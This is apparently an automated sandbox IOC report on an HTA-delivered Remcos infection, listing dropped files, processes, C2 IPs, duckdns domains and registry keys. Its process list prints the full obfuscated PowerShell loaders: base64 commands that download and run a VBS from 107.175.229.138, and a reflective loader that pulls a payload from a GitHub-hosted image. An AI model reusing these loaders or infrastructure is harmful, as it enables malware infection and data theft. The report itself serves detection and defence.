IOC Report
nicetokissthebestthingsiwantotgetmebackwith.hta

loading gif

Files

File Path
Type
Category
Malicious
nicetokissthebestthingsiwantotgetmebackwith.hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seethebestpicturewithgreatthingsinlinealways[1].tiff
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (362)
dropped
C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.out
Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\1nlzjhnh\CSC4E5E770DE006429A8ABEBD72CF3EF132.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RESE985.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Thu Oct 17 15:28:20 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aoc13cur.jnr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_atxsbzzc.rvl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dsuvbqso.kvc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fouaokqk.wff.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hgjrwynl.fin.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jcrb5zit.u2b.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jla3yyhy.m0l.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2iohv0p.ot5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yu3nwkcv.iss.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zqka54tf.w4o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv97B6.tmp
Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\kwva
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
There are 14 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\nicetokissthebestthingsiwantotgetmebackwith.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nlzjhnh\1nlzjhnh.cmdline"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpicturewithgreatthingsinlinea.vbS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kwva"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\mqalwary"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\xsnewtbsktv"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE985.tmp" "c:\Users\user\AppData\Local\Temp\1nlzjhnh\CSC4E5E770DE006429A8ABEBD72CF3EF132.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 6 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://raw.githubusercontent.com/CryptersAndToolsOf
unknown
malicious
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg
185.199.108.133
malicious
https://raw.githubusercontent.com
unknown
malicious
dantata.duckdns.org
malicious
danbana.duckdns.org
malicious
http://107.175.229.138/550/MNCCDR.txt
107.175.229.138
malicious
http://107.175.229.138/550/seethebestpicturewithgreatthingsinlinealways.tIF
107.175.229.138
malicious
https://raw.githubusercontent.com/Cryp
unknown
malicious
http://107.175.229.138/550/seethebestpicturewithgreatthingsinlinealways.tIFm
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://www.imvu.comr
unknown
https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgt
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://login.li
unknown
https://contoso.com/License
unknown
http://geoplugin.net/json.gphy
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
https://raw.githubusercontent.com/cryptersandtoolsof
unknown
http://www.nirsoft.net
unknown
http://107.175.229.138
unknown
http://go.micros
unknown
https://github.com/Pester/Pester
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://geoplugin.net/json.gp
178.237.33.50
https://www.google.com
unknown
http://crl.micro
unknown
http://geoplugin.net/json.gp/C
unknown
https://aka.ms/pscore6lB
unknown
http://107.175.229.138/550/MNCCDX
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://geoplugin.net/json.gpge0
unknown
http://107.175.229
unknown
https://www.google.com/accounts/servicelogin
unknown
https://login.yahoo.com/config/login
unknown
http://geoplugin.net/json.gpX
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.ebuddy.com
unknown
There are 35 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
raw.githubusercontent.com
185.199.108.133
malicious
dantata.duckdns.org
192.3.101.153
malicious
danbana.duckdns.org
192.169.69.26
malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
107.175.229.138
unknown
United States
malicious
185.199.108.133
raw.githubusercontent.com
Netherlands
malicious
192.169.69.26
danbana.duckdns.org
United States
malicious
192.3.101.153
dantata.duckdns.org
United States
malicious
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Rmc-UCDCW8
exepath
HKEY_CURRENT_USER\SOFTWARE\Rmc-UCDCW8
licence
HKEY_CURRENT_USER\SOFTWARE\Rmc-UCDCW8
time
There are 11 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
619E000
trusted library allocation
page read and write
malicious
5F9A000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
26AE000
stack
page read and write
malicious
A5A000
heap
page read and write
malicious
A8F000
heap
page read and write
malicious
CB0000
heap
page read and write
9421000
trusted library allocation
page read and write
7C00000
trusted library allocation
page read and write
4D17000
trusted library allocation
page read and write
2F18000
heap
page read and write
6A97000
heap
page read and write
5E2E000
stack
page read and write
303E000
heap
page read and write
5762000
heap
page read and write
3392000
heap
page read and write
54C1000
heap
page read and write
78D0000
trusted library allocation
page read and write
71C000
stack
page read and write
5743000
heap
page read and write
45D000
system
page execute and read and write
30EE000
stack
page read and write
7BA0000
trusted library allocation
page read and write
88CC000
stack
page read and write
7AD0000
trusted library allocation
page read and write
5879000
trusted library allocation
page read and write
5060000
heap
page read and write
3371000
heap
page read and write
7490000
trusted library allocation
page execute and read and write
ADB000
stack
page read and write
364E000
stack
page read and write
6A92000
heap
page read and write
7620000
trusted library allocation
page read and write
7888000
heap
page read and write
6A6B000
heap
page read and write
6513000
heap
page read and write
868D000
trusted library allocation
page read and write
33B5000
heap
page read and write
6A4B000
heap
page read and write
54C4000
heap
page read and write
5899000
trusted library allocation
page read and write
755E000
stack
page read and write
789A000
heap
page read and write
573B000
heap
page read and write
3397000
heap
page read and write
7660000
trusted library allocation
page read and write
6A54000
heap
page read and write
80A0000
trusted library allocation
page read and write
7A80000
trusted library allocation
page read and write
400000
system
page execute and read and write
D93000
trusted library allocation
page execute and read and write
3390000
heap
page read and write
3294000
trusted library allocation
page read and write
2E63000
heap
page read and write
68C0000
direct allocation
page read and write
292F000
stack
page read and write
8690000
trusted library allocation
page read and write
7D4E000
direct allocation
page read and write
6911000
heap
page read and write
6A6E000
heap
page read and write
8100000
heap
page read and write
58DF000
stack
page read and write
6A8E000
heap
page read and write
794E000
trusted library allocation
page read and write
5420000
heap
page read and write
2EC7000
heap
page read and write
4DCD000
heap
page read and write
78BC000
heap
page read and write
A2E000
stack
page read and write
51FE000
stack
page read and write
7B20000
trusted library allocation
page read and write
6A92000
heap
page read and write
6DB0000
trusted library allocation
page execute and read and write
6FAE000
stack
page read and write
41B000
system
page execute and read and write
54C1000
heap
page read and write
653D000
heap
page read and write
6AC1000
heap
page read and write
45E0000
heap
page read and write
8170000
heap
page read and write
6A97000
heap
page read and write
6A90000
heap
page read and write
A5E000
stack
page read and write
649E000
stack
page read and write
5733000
heap
page read and write
6A9D000
heap
page read and write
6E2E000
stack
page read and write
6AAC000
heap
page read and write
56E7000
trusted library allocation
page read and write
D8D000
stack
page read and write
77F0000
trusted library allocation
page read and write
D7E000
stack
page read and write
1210000
heap
page read and write
32D8000
heap
page read and write
4E29000
heap
page read and write
7670000
heap
page read and write
7A20000
trusted library allocation
page execute and read and write
1190000
heap
page read and write
87DE000
stack
page read and write
7AF0000
trusted library allocation
page read and write
6A97000
heap
page read and write
6A00000
heap
page read and write
4DF0000
heap
page read and write
7060000
heap
page read and write
6553000
heap
page read and write
7A77000
trusted library allocation
page read and write
6DDF000
stack
page read and write
517E000
stack
page read and write
2F0D000
heap
page read and write
5AB0000
trusted library allocation
page read and write
7C50000
trusted library allocation
page read and write
296E000
stack
page read and write
A421000
trusted library allocation
page read and write
6ABC000
heap
page read and write
2CCE000
stack
page read and write
7650000
trusted library allocation
page read and write
6581000
heap
page read and write
6A4F000
heap
page read and write
666B000
trusted library allocation
page read and write
FD0000
heap
page read and write
50C3000
trusted library allocation
page read and write
75EE000
stack
page read and write
7CE0000
direct allocation
page read and write
762E000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
8A22000
trusted library allocation
page read and write
32B0000
heap
page read and write
57C3000
heap
page read and write
6C20000
trusted library allocation
page read and write
56F4000
heap
page read and write
6D3B000
stack
page read and write
6259000
trusted library allocation
page read and write
75EF000
trusted library allocation
page read and write
6A2F000
heap
page read and write
6850000
trusted library allocation
page execute
6A9D000
heap
page read and write
323E000
stack
page read and write
33B6000
heap
page read and write
3374000
heap
page read and write
54B9000
heap
page read and write
814F000
stack
page read and write
6A0A000
heap
page read and write
88BD000
heap
page read and write
5789000
trusted library allocation
page read and write
AA2000
heap
page read and write
6563000
heap
page read and write
6BEC000
stack
page read and write
8500000
heap
page read and write
B77000
heap
page read and write
75C0000
trusted library allocation
page read and write
33B9000
heap
page read and write
4B6E000
stack
page read and write
6A4B000
heap
page read and write
CFD000
stack
page read and write
4690000
trusted library allocation
page read and write
6A08000
heap
page read and write
2880000
heap
page read and write
4E60000
heap
page readonly
64F9000
heap
page read and write
3A5000
heap
page read and write
6521000
heap
page read and write
6F3A000
stack
page read and write
33C8000
heap
page read and write
6AAC000
heap
page read and write
5725000
heap
page read and write
73B0000
heap
page execute and read and write
466F000
stack
page read and write
7680000
trusted library allocation
page read and write
472E000
stack
page read and write
2E84000
heap
page read and write
4698000
trusted library allocation
page read and write
6553000
heap
page read and write
6A97000
heap
page read and write
7D40000
direct allocation
page read and write
6A6B000
heap
page read and write
74EE000
stack
page read and write
27EF000
stack
page read and write
459000
system
page execute and read and write
47A0000
heap
page read and write
2F86000
heap
page read and write
655D000
heap
page read and write
780000
heap
page read and write
6AAC000
heap
page read and write
7F0000
heap
page read and write
5762000
heap
page read and write
6E7E000
stack
page read and write
4D28000
trusted library allocation
page read and write
6A6E000
heap
page read and write
34D7000
heap
page read and write
67E0000
heap
page read and write
7AB0000
trusted library allocation
page read and write
4DB3000
trusted library allocation
page read and write
7932000
trusted library allocation
page read and write
4BFA000
stack
page read and write
90D000
stack
page read and write
76C0000
heap
page read and write
733B000
stack
page read and write
2E6F000
stack
page read and write
34D0000
heap
page read and write
6A76000
heap
page read and write
6EBD000
stack
page read and write
6A84000
heap
page read and write
6800000
trusted library allocation
page read and write
5070000
heap
page read and write
7480000
trusted library allocation
page read and write
7050000
heap
page read and write
7FE000
stack
page read and write
3390000
heap
page read and write
78C9000
heap
page read and write
5736000
heap
page read and write
6A32000
heap
page read and write
5762000
heap
page read and write
85E0000
heap
page read and write
456D000
trusted library allocation
page execute and read and write
6A76000
heap
page read and write
879E000
stack
page read and write
6F6E000
stack
page read and write
E00000
heap
page read and write
7650000
trusted library allocation
page read and write
AD5000
heap
page read and write
4D45000
trusted library allocation
page read and write
51A6000
trusted library allocation
page read and write
8030000
heap
page read and write
8C30000
trusted library allocation
page read and write
5CE9000
trusted library allocation
page read and write
65AC000
trusted library allocation
page read and write
6A9D000
heap
page read and write
4640000
heap
page readonly
6A08000
heap
page read and write
6A8D000
heap
page read and write
71D0000
trusted library allocation
page read and write
34E0000
trusted library allocation
page execute and read and write
746E000
stack
page read and write
550E000
heap
page read and write
7302000
heap
page read and write
6A8D000
heap
page read and write
4F20000
heap
page read and write
E2B000
heap
page read and write
AD9000
heap
page read and write
756D000
stack
page read and write
7A70000
trusted library allocation
page read and write
4670000
trusted library allocation
page read and write
6A9D000
heap
page read and write
5A20000
heap
page read and write
E3E000
stack
page read and write
5196000
trusted library allocation
page read and write
57C3000
heap
page read and write
2F18000
heap
page read and write
69FC000
heap
page read and write
330E000
unkown
page read and write
7BB0000
trusted library allocation
page execute and read and write
2F1F000
heap
page read and write
4DBC000
heap
page read and write
74B0000
heap
page execute and read and write
6A6E000
heap
page read and write
759E000
stack
page read and write
6A0A000
heap
page read and write
6A0A000
heap
page read and write
54B7000
heap
page read and write
D60000
heap
page read and write
C00000
heap
page read and write
6DA0000
heap
page read and write
853C000
trusted library allocation
page read and write
6807000
heap
page read and write
4760000
heap
page read and write
4CC9000
trusted library allocation
page read and write
3391000
heap
page read and write
7220000
heap
page read and write
6A4B000
heap
page read and write
2F4A000
heap
page read and write
45B0000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
2A6F000
stack
page read and write
665B000
trusted library allocation
page read and write
31EF000
stack
page read and write
80C0000
heap
page read and write
77EE000
stack
page read and write
7931000
heap
page read and write
4DC2000
heap
page read and write
5F6B000
stack
page read and write
5D49000
trusted library allocation
page read and write
6A92000
heap
page read and write
32F2000
heap
page read and write
283E000
stack
page read and write
5736000
heap
page read and write
870D000
stack
page read and write
6556000
heap
page read and write
CD6000
heap
page read and write
7A50000
trusted library allocation
page execute and read and write
73B5000
heap
page execute and read and write
6A0A000
heap
page read and write
5969000
trusted library allocation
page read and write
6A47000
heap
page read and write
7630000
trusted library allocation
page read and write
10000000
direct allocation
page read and write
24AF000
stack
page read and write
794A000
trusted library allocation
page read and write
4E0F000
heap
page read and write
5702000
heap
page read and write
6584000
heap
page read and write
2E93000
heap
page read and write
8828000
heap
page read and write
51A2000
trusted library allocation
page read and write
7230000
trusted library allocation
page read and write
8080000
trusted library allocation
page execute and read and write
7C80000
trusted library allocation
page read and write
8530000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
8A21000
trusted library allocation
page read and write
743D000
stack
page read and write
5421000
heap
page read and write
73A9000
heap
page read and write
7A86000
trusted library allocation
page read and write
3391000
heap
page read and write
78A0000
heap
page execute and read and write
75B0000
trusted library allocation
page read and write
3332000
heap
page read and write
A9F000
stack
page read and write
5436000
heap
page read and write
6A7D000
heap
page read and write
6A54000
heap
page read and write
80BF000
stack
page read and write
DC2000
trusted library allocation
page read and write
46BF000
stack
page read and write
74BE000
stack
page read and write
2E92000
heap
page read and write
8070000
heap
page read and write
6A11000
heap
page read and write
2E5A000
heap
page read and write
88A0000
heap
page read and write
5194000
trusted library allocation
page read and write
68A6000
direct allocation
page read and write
747B000
stack
page read and write
56E1000
heap
page read and write
64AF000
heap
page read and write
8070000
trusted library allocation
page read and write
7D00000
direct allocation
page read and write
6999000
heap
page read and write
472E000
stack
page read and write
75E0000
trusted library allocation
page read and write
606D000
stack
page read and write
582B000
heap
page read and write
5753000
heap
page read and write
326F000
stack
page read and write
6A76000
heap
page read and write
569E000
stack
page read and write
73FF000
heap
page read and write
64AF000
heap
page read and write
B3E000
heap
page read and write
56EC000
heap
page read and write
4AED000
trusted library allocation
page read and write
6AAC000
heap
page read and write
4DAD000
heap
page read and write
7A60000
trusted library allocation
page read and write
6A92000
heap
page read and write
790C000
heap
page read and write
5716000
heap
page read and write
75AE000
stack
page read and write
6581000
heap
page read and write
75F0000
trusted library allocation
page read and write
7FB08000
trusted library allocation
page execute and read and write
2F1E000
heap
page read and write
583D000
heap
page read and write
DA0000
trusted library allocation
page read and write
753D000
stack
page read and write
1050000
heap
page read and write
6A8D000
heap
page read and write
2F7C000
heap
page read and write
6A6E000
heap
page read and write
6AAC000
heap
page read and write
32A0000
trusted library allocation
page read and write
5CE1000
trusted library allocation
page read and write
5040000
trusted library allocation
page read and write
6E3A000
